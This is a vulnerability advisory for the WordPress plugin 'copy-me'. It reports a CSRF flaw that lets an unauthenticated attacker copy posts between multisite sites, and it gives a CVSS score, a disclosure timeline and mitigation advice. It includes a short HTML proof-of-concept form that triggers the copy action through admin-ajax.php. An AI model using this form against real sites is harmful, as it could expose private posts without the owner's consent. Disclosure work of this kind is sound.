copy-me vulnerable to CSRF allowing unauthenticated attacker to copy posts


Last revised:

This plugin does not use nonces. Copying posts could allow taking a secret post from a non-public site within a multisite installation and moving it to a public site.

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability
Score 4.3 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality None
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Click submit and it’ll copy post with ID 1 to blog/site with ID 1:

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php">
  <input type="text" name="action" value="copyme_copy_item">
  <input type="text" name="id" value="1">
  <input type="text" name="target" value="1">
  <input type="submit">

Advisory timeline

  • 2016-11-01: Discovered
  • 2016-12-07: Reported to vendor via contact form:
  • 2016-12-07: Requested CVE
  • 2016-12-21: Vendor has not responded after 14 days
  • 2016-12-21: Published
  • 2017-09-29: Requested CVE

Mitigation/further actions

Disable the plugin. No fixed version is known.